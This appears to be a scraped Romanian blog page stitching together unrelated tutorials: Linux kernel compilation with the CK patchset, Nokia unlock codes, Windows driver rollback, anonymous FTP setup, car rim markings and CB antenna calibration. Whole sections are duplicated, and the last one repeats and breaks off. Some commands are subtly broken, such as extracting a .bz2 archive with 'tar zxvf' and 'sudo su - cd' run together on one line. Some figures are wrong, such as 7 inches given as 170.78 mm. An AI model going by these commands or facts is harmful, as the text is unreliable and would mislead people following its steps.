Sursa
NOTA : In tutorial voi folosi aptitude cand este nevoie de instalarea unor pachete. Intrucat acesta nu se mai gaseste implicit in Ubuntu 10.10 inlocuiti aptitude cu apt-get, sau mai simplu, instalati aptitude.
Cod:
sudo apt-get install aptitude
Cod:
sudo aptitude install kernel-package libncurses5-dev fakeroot wget bzip2 build-essential
Cod:
sudo su - cd /usr/src
Sa presupunem ca dorim sa compilam kernelul 2.6.36.1. Ca patch vom folosi patchsetul CK creat de Con Kolivas. Acesta include printre altele si un alt scheduler, BFS.
Se descarca sursele kernelului de pe www.kernel.org :
Cod:
wget -c http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.36.1.tar.bz2
Cod:
wget -c http://www.kernel.org/pub/linux/kernel/people/ck/patches/2.6/2.6.36/2.6.36-ck2/patch-2.6.36-ck2.bz2
Avem sursele, avem patch-ul, deci sa incepem :
Cod:
tar zxvf linux-2.6.36.1.tar.bz2 ln -s linux-2.6.36.1 linux cd /usr/src/linux
Cod:
bzip2 -dc /usr/src/patch-2.6.36-ck2.bz2|patch -p1 --dry-run bzip2 -dc /usr/src/patch-2.6.36-ck2.bz2|patch -p1
Acum vine partea cea mai dificila si anume configurarea noului kernel. Pentru inceput ar fi bine sa folositi configuratia kernelului pe care il rulati deja.
Cod:
cp /boot/config-`uname -r` ./.config
Cod:
make menuconfig
NOTADe asemenea puteti sa compilati un kernel super usor, care sa contina doar modulele pe care le folositi. Va rezulta un kernel cu 70-80 de module. Compilarea lui va dura extrem de putin si va fi foarte rapid. Se va instala mult mai repede decat un kernel obisnuit deoarece ramdiskul creat va contine putine module si va ocupa foarte putin spatiu pe disc.
In contrast kernelul cu care vine Ubuntu implicit contine cam 2600-2700 de module pe care probabil nu le veti folosi niciodata. Este un lucru bun insa, deoarece ei incearca sa acopere cat mai multe configuratii posibile folosind un singur kernel.
Dupa ce ati terminat de configurat kernelul, alegeti Exit si raspundeti cu Yes la intrebarea
Do you wish to save your new kernel configuration?
Apoi se poate incepe compilarea :
Cod:
make-kpkg clean fakeroot make-kpkg --initrd --append-to-version=-custom kernel_image kernel_headers
Acum trebuie sa aveti rabdare, compilarea unui kernel poate dura cateva ore in functie de viteza procesorului si de configuratia aleasa. Dupa terminarea compilarii in /usr/src se vor gasi doua pachete deb. Unul va contine kernelul, iar celalalt va contine headerele necesare compilarii de module pentru kernel (gen vbox, nvidia).
Se instaleaza cele doua pachete :
Cod:
sudo dpkg -i linux*deb
Cod:
sudo update-grub
Sursa
Esti interesat de Banner/Link Exchange?
Esti interesat de Banner Exchange?
Lasa un comentariu putin mai jos cu site-ul si o adresa de mail.
Cum sa deblocati un telefon Nokia codat? GRATIS
Coduri deblocare Nokia. Cum sa deblocati un telefon Nokia codat?
Puteti inlatura una dintre cele 4 blocari de retea folosind codurile urmatoare:
#pw+(master code)+Y#
Cu ajutorul acestui cod puteti activa/dezactiva restrictionarea SIMULUI (SP-lock). Pentru a
obtine simbolul “p” utilizati tasta “*”.
Y trebuie sa fie 1,2,3 sau 4 in functie de blocarea pe care o doriti:
#pw+1234567890+1# for Provider-Lock status
#pw+1234567890+2# for Network-Lock status
#pw+1234567890+3# for Provider-Lock status
#pw+1234567890+4# for SimCard-Lock status
“Master code” este un cod de 10 cifre bazat pe codul IMEI al telefonului. Master code il puteti genera de exemplu aici: http://nokiafree.org/free-nokia-unlock-codes/
Sursa
- Downloadati si instalati softul de aici
- Trebuie sa stiti seria IMEI a telefonului(*#06#
IMEI (International Mobile Equipment Identity) – numar unic de identificare al unui telefon.
Acest cod este valabil la toate modelele de telefoane mobile, nu doar la Nokia.) - Deschideti programul instalat si selectati modelul telefonului, apoi introduceti codul IMEI
- Completati tara si opetarorul de telefonie
- Apasati “Calculate”
- Se afiseaza mai multe coduri. Alegeti unul din el si introduceti-l in telefonul mobil
- Felicitari! Telefonul dv. a fost deblocat.
- Atentie! Unele modele de telefoane isi pierd garantia atunci cand faceti modificari software.
Puteti inlatura una dintre cele 4 blocari de retea folosind codurile urmatoare:
#pw+(master code)+Y#
Cu ajutorul acestui cod puteti activa/dezactiva restrictionarea SIMULUI (SP-lock). Pentru a
obtine simbolul “p” utilizati tasta “*”.
Y trebuie sa fie 1,2,3 sau 4 in functie de blocarea pe care o doriti:
#pw+1234567890+1# for Provider-Lock status
#pw+1234567890+2# for Network-Lock status
#pw+1234567890+3# for Provider-Lock status
#pw+1234567890+4# for SimCard-Lock status
“Master code” este un cod de 10 cifre bazat pe codul IMEI al telefonului. Master code il puteti genera de exemplu aici: http://nokiafree.org/free-nokia-unlock-codes/
Sursa
Restaurarea unui driver la versiunea sa anterioară
Trebuie să faceți Log on ca administrator pentru a efectua acești pași.
Poate fi necesar să restaurați driverul pentru un dispozitiv la o versiune anterioară, dacă întâmpinați probleme la computer sau la dispozitiv după upgrade-ul driverului.
- Deschideți Manager dispozitive făcând clic pe butonul Start
, pe Panou de control, pe Sistem și întreținere, apoi pe Manager dispozitive.
Dacă vi se solicită o parolă de administrator sau o confirmare, tastați parola sau furnizați confirmarea.
- Faceți dublu clic pe categoria care conține driverul pentru dispozitiv, apoi pe numele dispozitivului pe care doriți să îl restaurați la o versiune de driver anterioară.
- Faceți clic pe fila Driver, apoi pe Revenire la driver.
Repararea sau actualizarea unui driver
Dacă un dispozitiv hardware nu funcţionează corect sau dacă un program sau un joc pe care îl instalaţi afirmă că necesită drivere mai noi decât cele pe care le aveţi instalate în prezent, trebuie să căutaţi drivere actualizate la Windows Update. De asemenea, este recomandat să setaţi Windows Update pentru a căuta automat actualizări recomandate de drivere.
A treia opţiune este actualizarea manuală a driverelor pentru un dispozitiv.
| 1. Pentru a actualiza drivere utilizând Actualizare Windows |
Aveţi posibilitatea să verificaţi Windows Update în orice moment pentru a vedea dacă a găsit drivere noi pentru hardware. Apoi, dacă doriţi aceasta, aveţi posibilitatea să le instalaţi. Iată cum:
- Deschideți Actualizare Windows făcând clic pe butonul Start
- În panoul din partea stângă, faceţi clic pe Căutare actualizări.
- Pentru a vedea dacă sunt disponibile drivere actualizate, faceţi clic pe Vizualizare actualizări disponibile. Windows Update va lista toate driverele actualizate care sunt disponibile pentru dispozitivele instalate în computer.
- Dacă sunt disponibile actualizări, faceţi clic pe driverul pe care doriţi să îl instalaţi, apoi faceţi clic pe Install.
2. | Pentru setarea Windows să caute actualizări recomandate |
Chiar dacă aveţi Actualizare Windows setată pentru instalarea automată a actualizărilor importante pentru computer, este posibil să nu fie încă setată să instaleze toate driverele actualizate pe care le găseşte pentru hardware, din moment ce nu toate dintre acestea sunt clasificate ca fiind importante. Pentru obţinerea tuturor actualizărilor de drivere, este necesar să activaţi actualizările recomandate. Iată cum trebuie să setaţi Windows pentru a efectua aceasta:
- Deschideţi Actualizare Windows făcând clic pe butonul Start
- Faceţi clic pe Modificare setări în panoul din stânga.
- Faceţi clic pe Se instalează actualizările automat (recomandat).
- Sub Actualizări recomandate, bifaţi caseta de selectare pentru a Se includ actualizările recomandate când se descarcă, se instalează sau se anunţă actualizări, apoi faceţi clic pe OK.
Pentru a vă asigura că obţineţi cele mai recente drivere pentru hardware, configuraţi Windows să descarce automat actualizările recomandate
3. | Pentru a actualiza manual drivere |
Este ideal să lăsaţi Windows să instaleze automat drivere pentru hardware. Trebuie evitată actualizarea manuală a unui driver, cu excepţia cazului în care Windows nu poate găsi un driver pentru unul dintre dispozitive, dar aţi reuşit să obţineţi câteva printr-o altă modalitate sau dacă personalul de asistenţă tehnică vă solicită să instalaţi drivere de pe un disc sau de pe site-ul Web al producătorului dispozitivului. Dacă vă hotărâţi să actualizaţi manual un driver, iată cum procedaţi:
Trebuie să faceți Log on ca administrator pentru a efectua acești pași.
- Deschideți Manager dispozitive făcând clic pe butonul Start
- În Manager dispozitive, găsiţi dispozitivul pe care doriţi să îl actualizaţi, apoi faceţi dublu clic pe numele dispozitivului.
- Faceţi clic pe fila Driver, pe Actualizare driver, apoi urmaţi instrucţiunile.
Configurarea unui server FTP în Windows Server 2003
Instalarea Internet Information Services şi a serviciului FTP
Deoarece FTP depinde de Microsoft Internet Information Services (IIS), IIS şi serviciul FTP trebuie să fie instalate pe computer. Pentru a instala ISS şi serviciul FTP, urmaţi aceşti paşi:NOTĂ: În Windows Server 2003, serviciul FTP nu se instalează implicit odată cu instalarea IIS. Dacă aţi instalat deja IIS pe computer, trebuie să utilizaţi instrumentul Add or Remove Programs din Control Panel pentru a instala serviciul FTP.
- Faceţi clic pe Start, indicaţi spre Control Panel, apoi faceţi clic pe Add or Remove Programs.
- Faceţi clic pe Add/Remove Windows Components.
- În lista Components, faceţi clic pe Application Server, pe Internet Information Services (IIS) (dar nu bifaţi sau debifaţi caseta de selectare), apoi faceţi clic pe Details.
- Faceţi clic pentru a bifa următoarele casete de selectare (dacă nu sunt deja bifate):Common Files
File Transfer Protocol (FTP) Service
Internet Information Services Manager - Faceţi clic pentru a bifa caseta de selectare de lângă orice serviciu sau subcomponentă asociate cu IIS pe care doriţi să le instalaţi, apoi faceţi clic pe OK.
- Faceţi clic pe Next.
- Când vi se solicită, introduceţi CD-ROM-ul Windows Server 2003 în unitatea CD-ROM sau DVD-ROM a computerului sau furnizaţi o cale către locaţia fişierelor, apoi faceţi clic pe OK.
- Faceţi clic pe Finish.
Configurarea serviciului FTP
Pentru a configura serviciul FTP pentru a permite numai conexiuni anonime, urmaţi paşii:- Porniţi Internet Information Services Manager sau deschideţi utilitarul de completare snap-in IIS.
- Extindeţi Nume_server, unde nume_server este numele serverului.
- Extindeţi FTP Sites
- Faceţi clic cu butonul din dreapta pe Default FTP Site, apoi faceţi clic pe Properties.
- Faceţi clic pe fila Security Accounts.
- Faceţi clic pentru a bifa caseta de selectare Allow Anonymous Connections (dacă nu este deja bifată), apoi faceţi clic pentru a bifa caseta de selectare Allow only anonymous connections.
Când faceţi clic pentru a bifa caseta de selectare Allow only anonymous connections, configuraţi serviciul FTP pentru a permite numai conexiuni anonime. Utilizatorii nu pot să facă Log on utilizând numele de utilizator şi parolele lor. - Faceţi clic pe fila Home Directory.
- Faceţi clic pentru a bifa casetele de selectare Read şi Log visits (dacă nu sunt deja bifate), apoi faceţi clic pentru a debifa caseta de selectare Write (dacă nu este deja debifată).
- Faceţi clic pe OK.
- Închideţi Internet Information Services Manager sau închideţi utilitarul de completare snap-in IIS.
Sursa
Jantele auto, de la A la Z
Jantele auto, de la A la Z
De obicei, jantele au inscrise pe ele cateva numere care spun totul despre ele, insa degeaba le citim daca nu intelegem ce reprezinta. Majoritatea au inscrise o suita de numere si litere de genul 6Jx15 H2-40 ET45. Pare un mesaj codat, insa este mult mai simplu decat credeti. De aceea, le vom lua pe rand si vom explica ce inseamna fiecare mic detaliu si amanunt al jantelor, scris in acest cod sau nu.
A - Latimea interioara a jantei
Este urmatorul semn inscriptionat pe janta, dupa diametru - 6Jx15, unde 6 e latimea interioara a jantei, masurata in inci. In general ne dam seama care este diametrul jantei si care este latimea interioara a jantei, cea din urma fiind semnificativ mai mica. Aceasta se masoara intre marginile jantei, acolo unde intra anvelopa. Trebuie sa stim acest parametru al jantei pentru a putea determina diametrul anvelopei pe care o suporta. De exemplu, 7J inseamna 7 inci, mai exact 170.78 mm, de unde rezulta ca putem folosi o anvelopa in jurul dimensiunii de 170mm latime. Daca vom avea 9J, o sa putem pune anvelope ce au o latime de 225 mm. Aici mai intra si toleranta pe care o dau marginile jantei, astfel incat putem pune si anvelope putin mai mari, in general cu maxim 2 cm (grosimea marginii este in medie de 9 mm) sau dimensiunea imediat urmatoare. Astfel, pentru performante optime si pentru a respecta specificatiile jantei si cele ale anvelopei, la 7J putem pune anvelope de maximum 175 iar la 9J vom putea pune de 235. De cele mai multe ori, nu se respecta aceste proportii, insa performanta optima este data de acest numar.
B - Profilul jantei (J)
Mai sus am folosit drept exemplu J-ul care este prezent pe multe jante, insa putina lume stie si ce inseamna. J, JJ, K, JK, B,P sau D sunt litere care apar laolalta cu cifra care arata latimea interioara a jantei, cum ar fi 7J. Literele arata ce fel de profil are janta, mai exact, pe ce suprafata se asaza anvelopa. Majoritatea masinilor din ziua de astazi au "J", un profil al jantei des intalnit si universal. Masinile 4x4 au de multe ori jante cu profil "JJ", in timp ce, de exemplu, masinile Jaguar mai vechi au profil "K". Putem spune ca profilul se alege in functie de producator dar si de scopul masinii.
C - Diametrul total
Multa lume stie ca diametrul jantelor se masoara in inci (toli), incepand cu 12" (pe Tico), pana la dimensiuni uriase, "american pimp style", pentru care nu exista nici macar anvelope - 30". Diametrul jantelor este usor de masurat cu o ruleta, trecand prin centrul jantei, masurand dintr-o parte in alta a suprafetei exterioare. Alegerea diametrului unui set de jante depinde numai de dimensiunule inscrise in talon referitoare la acestea sau de gusturi personale. Diametrul jantei il veti gasi totodata inscriptionat pe jante, de obicei fiind primul numar - 15x* unde 15 reprezinta diametrul rotii. Bininteles ca diamentrul unei jante va influenta greutatea, stabilitatea, demarajul sau alti factori ai masinii.
D - "Cocoasa" jantei
H, H2, FH, CH, EH sau EH2 sunt inscriptionari pe care le putem intalni si pe jante. Este vorba despre codul specific fiecarei jante, in functie de numarul si aspectul cocoaselor de pe profilul jantei. Acestea sunt denumirile si descrierea pentru fiecare cod ce apare pe janta.
E - Factorul de echilibru - OS (ET-ul)
Se mai numeste si offset, o dimensiune si dimensiune foarte importanta si mereu imprimata pe orice janta. Spre deosebire de alti parametrii, cum ar fi distanta intre prezoane sau diametrul jantei, factorul de echilibru este mai putin cunoscut si luat in considerare. Insa este poate cel mai important in alegerea unui nou set de roti. Factorul de echilibru influenteaza faptul cum arata o roata montata pe masina, cat patrunde in spatiul rotii si daca anvelopa va atinge sau nu elementele caroseriei, contraaripi sau suspensie. Factorul de echilibru se se masoara intre linia centrala imaginara ce strabate janta lateral pe mijloc si suprafata de montare a jantei, acolo unde face contact cu fuzeta. Aceasta distanta se masoara in milimetrii si este intodeauna inscriptionata pe janta, alaturi de "ET", ceea ce inseamna "Einpress Tieffe", factor de echilibru in germana. Nu de putine ori se intampla ca atunci cand franam la viteze mari, volanul sa vibreze (ET nepotrivit pentru suspensia masinii), rotile sa atinga in contraaripi sau spoilere, volanul sa mearga foarte greu si usor si instabil, sau suspensia sa reactioneze gresit, toate acestea putand fi cauzate de alegerea unei jante cu un factor de echilibru eronat.
Latimea totala a jantei
Aceasta este latimea reala a jantei, masurata de la un capat la altul a suprafetei de rulare, din exteriorul marginilor (sau peretilor jantei, cum se mai numesc). Dimensiunea aceasta nu apare nicaieri inscriptionata pe janta, fiind usor dedusa din latimea interioara a jantei, la care se mai adauga in general 8-9mm x 2, adica latimea celor doua margini ale jantei pe care sta anvelopa. Latimea totala a jantei ne ajuta destul de mult in calcularea spatiului pe care il avem pentru a pune o janta fara a atinge diferite elemente ale caroseriei.
Diametrul gaurii centrale
Este vorba de gaura din centrul lateral al jantei, in mijlocul gaurilor pentru prezoane, acoperita de cele mai multe ori cu un capacel de plastic. Aceasta dimensiune nu apare inscriptionata pe janta, insa in specificatiile jantei ar trebui sa fie. Ne ajuta sa determinam daca roata se potriveste cu fuzeta nasubuum acolo unde este capatul planetarei. De obicei, diametrul acestei gauri centrale este universal, insa cazuri speciale nu permit pozitionarea unei jante uniform pe fuzeta din pricina acestei gauri ce se dovedeste a fi prea mica. In acest caz, se folosesc flanse de distantare. Pentru a evita acest fenomen, e bine de stiut diametrul gaurii interioare, care se masoara in milimetrii.
PCD
"Pitch Circle Diameter" este diametrul cercului imaginar facut de centrul prezoanelor. Acesta se masoara in milimetrii. Cand schimbam jantele este esential sa cunoastem acest PCD care reprezinta, de fapt, distanta intre prezoane.
Distanta intre prezoane
In general, fiecare stie ce distanta intre prezoane are masina lui. Fie ca este 4x100, 5x112 ori 5x100, orice masina are o anumita distanta intre prezoane. Daca nu cunoastem exact aceasta dimensiune, putem alege gresit jantele pentru masina noastra. Distanta intre prezoane este de o bicei stantata si pe janta, sub o forma de gen 4x100, unde 4 reprezinta numarul de gauri (prezoane) si 100 distanta in milimetrii intre prezoane. De exemplu, 5x120 este dimensiunea standard pentru BMW, adica - 5 prezoane cu o distanta intre ele de 120 mm. Multa lume stie aceste dimensiuni, insa nu cunosc modalitatea exacta de masurare.
- la masini cu 4, 6 sau 8 prezoane - se masoara din centrul imaginar al celor doua gauri opuse.
- la masinile cu 5 prezoane - se masoara din marginea indepartata a unei gauri pana in centrul celei de-a doua gauri.
Back Space - BS
Distanta dintre suprafata de montare a jantei si marginea interioara a acesteia (marginea care este in interiorul jantei, odata montate). Acesta ne ajuta sa ne dam seama daca janta va atinge sau nu anumite elemente ale masinii. Acest parametru nu este inscriptionat pe janta, dar este mentionat in specificatiile acesteia.
Centrarea unei jante
Jantele au doua feluri de centrare pe fuzeta:
- centrate de catre gaura centralica (hubcentric)
- centrate de catre prezoane (lugcentric)
Linia centrala
Este linia imaginara pe mijlocul unei jante vazute din profil. Linia centrala este doar un factor de masurare, in functie de care se determina diferite dimensiuni ale jantei.
Gaura valvei
Un orificiu prin care se pune valva de umflare a anvelopei. De obicei, jantele vin impreuna cu un set de valve, specifice jantei. Exista si valve ascunse, ce nu ies in evidenta, pentru a nu strica design-ul rotii. Pentru acestea, impreuna cu jantele, vine si un ventil special care permite umflarea anvelopelor.
Diametrul de montare
Este diametrul suprafetei ce intra in contact cu fuzeta, la montaj. Se masoara pe partea interioara a jantei, in milimetrii. Este important de stiut acest diametru mentionat in specificatiile jantei pentru a nu avea o fuzeta prea mare sau prea mica, rezultand astfel lipsa stabilitatii si echilibrului. O alternativa la aceasta problema este montarea unor flanse adaptoare, solutie pe care fabricantii de jante o combat.
Alti parametri de clasificare
Greutatea jantelor este de cele mai multe ori specificata in manualul de utilizare si intretinere. Sunt jante din mai multe feluri de aliaje, de la cele mai usoare folosite in mediul raliurilor si al competitiilor oficiale, pana la cele mai grele si mai mari, preferate in general de americanii amatori de "bling-bling". Jantele in sine pot fi de mai multe feluri, in functie de materiale sau componente. Majoritatea jantelor sunt turnate, monobloc. Adica sunt din aliaj turnate in matrite, dintr-o singura bucata. Exista si jante forjate sau/si din doua sau mai multe bucati. Unele jante sunt facute din mai multe bucati pentru a permite schimbarea spitelor sau a "florii" interioare, lasand numai suprafata de contact cu anvelopa. Tot din mai multe elemente sunt si jantele tip spinnere. Finisajul jantelor este si el de mai multe feluri - lucios, mat, in diferite culori, aluminiu polisat, crom, auriu, multicolore sau in culorile aliajului. Mai nou, exista jante transparente, ce au "floarea" prin care trec prezoanele din plexiglas, sau cu efecte de holograma cu diferite imagini. Scopul acestora este pur estetic.
Acum ca lucrurile sunt ceva mai clare referitor la jante, acele elemente ale masinii care ne pun in contact cu realitatea si cu asfaltul, poate pe viitor o sa reusiti sa alegeti cele mai bune si mai potrivite jante pentru masina voastra.
A - Latimea interioara a jantei
Este urmatorul semn inscriptionat pe janta, dupa diametru - 6Jx15, unde 6 e latimea interioara a jantei, masurata in inci. In general ne dam seama care este diametrul jantei si care este latimea interioara a jantei, cea din urma fiind semnificativ mai mica. Aceasta se masoara intre marginile jantei, acolo unde intra anvelopa. Trebuie sa stim acest parametru al jantei pentru a putea determina diametrul anvelopei pe care o suporta. De exemplu, 7J inseamna 7 inci, mai exact 170.78 mm, de unde rezulta ca putem folosi o anvelopa in jurul dimensiunii de 170mm latime. Daca vom avea 9J, o sa putem pune anvelope ce au o latime de 225 mm. Aici mai intra si toleranta pe care o dau marginile jantei, astfel incat putem pune si anvelope putin mai mari, in general cu maxim 2 cm (grosimea marginii este in medie de 9 mm) sau dimensiunea imediat urmatoare. Astfel, pentru performante optime si pentru a respecta specificatiile jantei si cele ale anvelopei, la 7J putem pune anvelope de maximum 175 iar la 9J vom putea pune de 235. De cele mai multe ori, nu se respecta aceste proportii, insa performanta optima este data de acest numar.
B - Profilul jantei (J)
Mai sus am folosit drept exemplu J-ul care este prezent pe multe jante, insa putina lume stie si ce inseamna. J, JJ, K, JK, B,P sau D sunt litere care apar laolalta cu cifra care arata latimea interioara a jantei, cum ar fi 7J. Literele arata ce fel de profil are janta, mai exact, pe ce suprafata se asaza anvelopa. Majoritatea masinilor din ziua de astazi au "J", un profil al jantei des intalnit si universal. Masinile 4x4 au de multe ori jante cu profil "JJ", in timp ce, de exemplu, masinile Jaguar mai vechi au profil "K". Putem spune ca profilul se alege in functie de producator dar si de scopul masinii.
C - Diametrul total
Multa lume stie ca diametrul jantelor se masoara in inci (toli), incepand cu 12" (pe Tico), pana la dimensiuni uriase, "american pimp style", pentru care nu exista nici macar anvelope - 30". Diametrul jantelor este usor de masurat cu o ruleta, trecand prin centrul jantei, masurand dintr-o parte in alta a suprafetei exterioare. Alegerea diametrului unui set de jante depinde numai de dimensiunule inscrise in talon referitoare la acestea sau de gusturi personale. Diametrul jantei il veti gasi totodata inscriptionat pe jante, de obicei fiind primul numar - 15x* unde 15 reprezinta diametrul rotii. Bininteles ca diamentrul unei jante va influenta greutatea, stabilitatea, demarajul sau alti factori ai masinii.
D - "Cocoasa" jantei
H, H2, FH, CH, EH sau EH2 sunt inscriptionari pe care le putem intalni si pe jante. Este vorba despre codul specific fiecarei jante, in functie de numarul si aspectul cocoaselor de pe profilul jantei. Acestea sunt denumirile si descrierea pentru fiecare cod ce apare pe janta.
E - Factorul de echilibru - OS (ET-ul)
Se mai numeste si offset, o dimensiune si dimensiune foarte importanta si mereu imprimata pe orice janta. Spre deosebire de alti parametrii, cum ar fi distanta intre prezoane sau diametrul jantei, factorul de echilibru este mai putin cunoscut si luat in considerare. Insa este poate cel mai important in alegerea unui nou set de roti. Factorul de echilibru influenteaza faptul cum arata o roata montata pe masina, cat patrunde in spatiul rotii si daca anvelopa va atinge sau nu elementele caroseriei, contraaripi sau suspensie. Factorul de echilibru se se masoara intre linia centrala imaginara ce strabate janta lateral pe mijloc si suprafata de montare a jantei, acolo unde face contact cu fuzeta. Aceasta distanta se masoara in milimetrii si este intodeauna inscriptionata pe janta, alaturi de "ET", ceea ce inseamna "Einpress Tieffe", factor de echilibru in germana. Nu de putine ori se intampla ca atunci cand franam la viteze mari, volanul sa vibreze (ET nepotrivit pentru suspensia masinii), rotile sa atinga in contraaripi sau spoilere, volanul sa mearga foarte greu si usor si instabil, sau suspensia sa reactioneze gresit, toate acestea putand fi cauzate de alegerea unei jante cu un factor de echilibru eronat.
Latimea totala a jantei
Aceasta este latimea reala a jantei, masurata de la un capat la altul a suprafetei de rulare, din exteriorul marginilor (sau peretilor jantei, cum se mai numesc). Dimensiunea aceasta nu apare nicaieri inscriptionata pe janta, fiind usor dedusa din latimea interioara a jantei, la care se mai adauga in general 8-9mm x 2, adica latimea celor doua margini ale jantei pe care sta anvelopa. Latimea totala a jantei ne ajuta destul de mult in calcularea spatiului pe care il avem pentru a pune o janta fara a atinge diferite elemente ale caroseriei.
Diametrul gaurii centrale
Este vorba de gaura din centrul lateral al jantei, in mijlocul gaurilor pentru prezoane, acoperita de cele mai multe ori cu un capacel de plastic. Aceasta dimensiune nu apare inscriptionata pe janta, insa in specificatiile jantei ar trebui sa fie. Ne ajuta sa determinam daca roata se potriveste cu fuzeta nasubuum acolo unde este capatul planetarei. De obicei, diametrul acestei gauri centrale este universal, insa cazuri speciale nu permit pozitionarea unei jante uniform pe fuzeta din pricina acestei gauri ce se dovedeste a fi prea mica. In acest caz, se folosesc flanse de distantare. Pentru a evita acest fenomen, e bine de stiut diametrul gaurii interioare, care se masoara in milimetrii.
PCD
"Pitch Circle Diameter" este diametrul cercului imaginar facut de centrul prezoanelor. Acesta se masoara in milimetrii. Cand schimbam jantele este esential sa cunoastem acest PCD care reprezinta, de fapt, distanta intre prezoane.
Distanta intre prezoane
In general, fiecare stie ce distanta intre prezoane are masina lui. Fie ca este 4x100, 5x112 ori 5x100, orice masina are o anumita distanta intre prezoane. Daca nu cunoastem exact aceasta dimensiune, putem alege gresit jantele pentru masina noastra. Distanta intre prezoane este de o bicei stantata si pe janta, sub o forma de gen 4x100, unde 4 reprezinta numarul de gauri (prezoane) si 100 distanta in milimetrii intre prezoane. De exemplu, 5x120 este dimensiunea standard pentru BMW, adica - 5 prezoane cu o distanta intre ele de 120 mm. Multa lume stie aceste dimensiuni, insa nu cunosc modalitatea exacta de masurare.
- la masini cu 4, 6 sau 8 prezoane - se masoara din centrul imaginar al celor doua gauri opuse.
- la masinile cu 5 prezoane - se masoara din marginea indepartata a unei gauri pana in centrul celei de-a doua gauri.
Back Space - BS
Distanta dintre suprafata de montare a jantei si marginea interioara a acesteia (marginea care este in interiorul jantei, odata montate). Acesta ne ajuta sa ne dam seama daca janta va atinge sau nu anumite elemente ale masinii. Acest parametru nu este inscriptionat pe janta, dar este mentionat in specificatiile acesteia.
Centrarea unei jante
Jantele au doua feluri de centrare pe fuzeta:
- centrate de catre gaura centralica (hubcentric)
- centrate de catre prezoane (lugcentric)
Linia centrala
Este linia imaginara pe mijlocul unei jante vazute din profil. Linia centrala este doar un factor de masurare, in functie de care se determina diferite dimensiuni ale jantei.
Gaura valvei
Un orificiu prin care se pune valva de umflare a anvelopei. De obicei, jantele vin impreuna cu un set de valve, specifice jantei. Exista si valve ascunse, ce nu ies in evidenta, pentru a nu strica design-ul rotii. Pentru acestea, impreuna cu jantele, vine si un ventil special care permite umflarea anvelopelor.
Diametrul de montare
Este diametrul suprafetei ce intra in contact cu fuzeta, la montaj. Se masoara pe partea interioara a jantei, in milimetrii. Este important de stiut acest diametru mentionat in specificatiile jantei pentru a nu avea o fuzeta prea mare sau prea mica, rezultand astfel lipsa stabilitatii si echilibrului. O alternativa la aceasta problema este montarea unor flanse adaptoare, solutie pe care fabricantii de jante o combat.
Alti parametri de clasificare
Greutatea jantelor este de cele mai multe ori specificata in manualul de utilizare si intretinere. Sunt jante din mai multe feluri de aliaje, de la cele mai usoare folosite in mediul raliurilor si al competitiilor oficiale, pana la cele mai grele si mai mari, preferate in general de americanii amatori de "bling-bling". Jantele in sine pot fi de mai multe feluri, in functie de materiale sau componente. Majoritatea jantelor sunt turnate, monobloc. Adica sunt din aliaj turnate in matrite, dintr-o singura bucata. Exista si jante forjate sau/si din doua sau mai multe bucati. Unele jante sunt facute din mai multe bucati pentru a permite schimbarea spitelor sau a "florii" interioare, lasand numai suprafata de contact cu anvelopa. Tot din mai multe elemente sunt si jantele tip spinnere. Finisajul jantelor este si el de mai multe feluri - lucios, mat, in diferite culori, aluminiu polisat, crom, auriu, multicolore sau in culorile aliajului. Mai nou, exista jante transparente, ce au "floarea" prin care trec prezoanele din plexiglas, sau cu efecte de holograma cu diferite imagini. Scopul acestora este pur estetic.
Acum ca lucrurile sunt ceva mai clare referitor la jante, acele elemente ale masinii care ne pun in contact cu realitatea si cu asfaltul, poate pe viitor o sa reusiti sa alegeti cele mai bune si mai potrivite jante pentru masina voastra.
Calibrare antena statie radio CB
Calibrare antena statie CB. Cum se calibreaza o statie radio CB cu ajutorul reflectometrului:
Pentru o functionare optima a unei Statii Radio CB, aceasta va trebui reglata la centrul benzii iar pentru aceast lucru avem nevoie de un aparat numit Reflectometru (pentru 27 MHz) si de un cablu RG58 de 50 cm (lungimea optima) cu doi conectori PL259 montati la capetele lui (se gaseste de cumparat gata facut). De preferat este ca masina sa nu fie pozitionata intr-o parcare cu multe masini in jurul ei
Pasii pentru calibrarea unei antene sunt urmatorii:
Pasul 1: Se leaga antena la borna "ANT" a reflectometrului, se face conexiunea cu cablul prezentat mai sus dintre statie si borna "Tx" a reflectometrului si bineinteles se alimenteaza si se porneste statia. Antena va trebui in prealabil de asemenea instalata pe masina, prefereabil la centrul plafonului (nu intru in detalii) sau in orice loc prefereat de voi (pe capacul portbagajului, etc).
Pasul 2: Se trece comutatorul refectometrului pe pozitia "CAL" (sau "FWD" dupa caz), se intra cu statia in emisie prin apasarea PTT-ului de la microfon si se roteste potentiometrul "CAL" astfel incat acul sa fie pozitionat la capat de scala. Se trece comutatorul pe pozitia "SWR" si se citeste valoarea obtinuta.
Pasul 3: Se trece statia pe canalul 40, se repeta aceeasi operatiune si se citeste valoarea de pe canalul 40.
Pasul 4: Daca valoarea obtinuta pe canalul 1 este mai mare decat cea obtinuta pe canalul 40 atunci se desfac suruburile de la spicul antenei si acesta va trebui pozitionat mai sus in bobina. Daca pe canalul 40 avem o valoare mai mare decat pe canalul 1 spicul va trebui bagat mai mult in bobina (mai jos). Daca acesta a fost bagat la maxim, va trebui taiat din el un (1) cm.
Pasul 5: Se repeta pasii 2-3-4 pana cand valoarea de pe canalul 1 este egala cu valoarea obtinuta pe canalul 40.
Pasul 6: La final se masoara valoarea de pe canalul 20 (sau 22 pt canalul Infotrafic din Romania) pentru a vedea pierderile de putere in functie de valoarea obtinuta pentru reflectata.
Dupa cum v-ati dat seama, prin aceasta operatiune se urmareste ca valorile reflectatei de pe canalele 1 si 40 sa fie egale si cat mai mici (cat mai apropiate de 1 - vezi tabelul de mai jos cu pierderile pentru fiecare valoare a SWR-ului in parte). Reflectata ideala este bineinteles 1.0:1
Se trece comutatorul refectometrului pe pozitia "CAL" (sau "FWD" dupa caz), se intra cu statia in emisie prin apasarea PTT-ului de la microfon si se roteste potentiometrul "CAL" astfel incat acul sa fie pozitionat la capat de scala. Se trece comutatorul pe pozitia "SWR" si se citeste valoarea obtinuta.
Pentru o functionare optima a unei Statii Radio CB, aceasta va trebui reglata la centrul benzii iar pentru aceast lucru avem nevoie de un aparat numit Reflectometru (pentru 27 MHz) si de un cablu RG58 de 50 cm (lungimea optima) cu doi conectori PL259 montati la capetele lui (se gaseste de cumparat gata facut). De preferat este ca masina sa nu fie pozitionata intr-o parcare cu multe masini in jurul ei
Pasii pentru calibrarea unei antene sunt urmatorii:
